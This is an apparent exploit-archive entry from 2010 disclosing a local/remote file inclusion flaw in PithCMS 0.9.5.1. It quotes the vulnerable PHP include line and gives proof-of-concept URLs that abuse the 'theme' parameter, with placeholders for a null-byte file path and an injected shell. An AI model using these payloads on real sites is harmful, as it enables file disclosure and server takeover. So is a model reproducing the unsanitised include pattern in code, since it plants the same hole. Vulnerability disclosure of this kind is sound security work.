Pithcms - 'theme' Local/Remote File Inclusion



EKU-ID: 20787 CVE: OSVDB-ID:
Author: eidelweiss Published: 2010-07-08 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


Title:		pithcms (theme) Local / remote File inclusion VUlnerability
Version:	0.9.5.1
download:	http://sourceforge.net/projects/pithcms/files/
Author:		eidelweiss
Contact:	g1xsystem[at]windowslive.com

=====================================================================

	-=[ CODE ]=-

include ("templates/".$theme."/index.php");

	-=[ P0C ]=-

	http://127.0.0.1/path/index.php?theme= [LFI]%00

	htp://127.0.0.1/path/index.php?theme= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================